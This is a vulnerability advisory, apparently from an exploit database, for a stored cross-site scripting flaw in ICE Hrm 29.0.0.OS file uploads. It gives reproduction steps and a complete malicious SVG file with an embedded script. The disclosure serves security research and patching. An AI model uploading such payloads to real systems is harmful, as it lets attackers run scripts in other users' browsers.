ICE Hrm 29.0.0.OS xml upload Stored Cross-Site Scripting

2021.06.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: https://icehrm.com/ # Version: 29.0.0.OS # Tested on: Windows 10 and Kali #Description The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. #Steps to Reproduce the issue: 1- Login to ICE Hrm Admin Panel 2- Click on Employees=>Document Management=> Upload a below xml file <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS"); </script> </svg> 3- Visit the upload location of file and XSS will get triggered. #Video POC: https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top